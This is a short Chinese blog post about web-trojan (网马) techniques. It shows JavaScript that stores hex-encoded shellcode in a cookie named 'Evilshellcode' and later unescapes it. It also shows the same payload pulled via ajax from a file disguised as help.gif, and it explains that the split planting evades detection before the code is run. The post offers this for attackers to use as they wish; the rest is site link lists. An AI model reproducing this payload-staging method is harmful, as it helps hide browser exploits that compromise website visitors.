一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
一组JS创建和操作表格的函数集合
May 07 Javascript
Js切换功能的简单方法
Nov 23 Javascript
js 弹出框只弹一次(二次修改之后的)
Nov 26 Javascript
JS中如何设置readOnly的值
Dec 25 Javascript
JS兼容浏览器的导出Excel(CSV)文件的方法
May 03 Javascript
table insertRow、deleteRow定义和用法总结
May 14 Javascript
20个实用的JavaScript技巧分享
Nov 28 Javascript
浅谈Javascript数组的使用
Jul 29 Javascript
微信小程序 商城开发(ecshop )简单实例
Apr 07 Javascript
JavaScript设计模式之策略模式详解
Jun 09 Javascript
JS一次前端面试经历记录
Mar 19 Javascript
vue实现div可拖动位置也可改变盒子大小的原理
Sep 16 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
咖啡知识 咖啡养豆要养多久 排气又是什么
2021/03/06 新手入门
PHP怎样调用MSSQL的存储过程
2006/10/09 PHP
PHP使用缓存即时输出内容(output buffering)的方法
2015/08/03 PHP
PHP 读取大文件并显示的简单实例(推荐)
2016/08/12 PHP
PHP实现统计代码行数小工具
2019/09/19 PHP
js 鼠标点击事件及其它捕获
2009/06/04 Javascript
jquery tools之tabs 选项卡/页签
2009/07/25 Javascript
输入密码检测大写是否锁定js实现代码
2012/12/03 Javascript
JS简单实现登陆验证附效果图
2013/11/19 Javascript
javascript关于继承的用法汇总
2014/12/20 Javascript
javascript创建函数的20种方式汇总
2015/06/23 Javascript
jquery自定义插件开发之window的实现过程
2016/05/06 Javascript
javascript正则表达式之分组概念与用法实例
2016/06/16 Javascript
Vuejs第十篇之vuejs父子组件通信
2016/09/06 Javascript
详解使用jQuery.i18n.properties实现js国际化
2018/05/04 jQuery
vue实现微信浏览器左上角返回按钮拦截功能
2020/01/18 Javascript
Vue使用axios引起的后台session不同操作
2020/08/14 Javascript
jQuery实现简单评论功能
2020/08/19 jQuery
在Vue中使用HOC模式的实现
2020/08/23 Javascript
基于jquery实现彩色投票进度条代码解析
2020/08/26 jQuery
vue 使用vant插件做tabs切换和无限加载功能的实现
2020/11/04 Javascript
原生js实现自定义消息提示框
2020/11/19 Javascript
python 计算数组中每个数字出现多少次--“Bucket”桶的思想
2017/12/19 Python
windows7 32、64位下python爬虫框架scrapy环境的搭建方法
2018/11/29 Python
Python的条件锁与事件共享详解
2019/09/12 Python
Python:slice与indices的用法
2019/11/25 Python
python剪切视频与合并视频的实现
2020/03/03 Python
超全Python图像处理讲解(多模块实现)
2020/04/13 Python
PyQt5-QDateEdit的简单使用操作
2020/07/12 Python
python 从list中随机取值的方法
2020/11/16 Python
Myprotein蛋白粉美国官网:欧洲畅销运动营养品牌
2016/11/15 全球购物
马来西亚最大的电器网站:Senheng
2017/10/13 全球购物
司机检讨书
2014/02/13 职场文书
幼师小班个人总结
2015/02/12 职场文书
创业计划书之宠物店
2019/09/19 职场文书
Vue深入理解插槽slot的使用
2022/08/05 Vue.js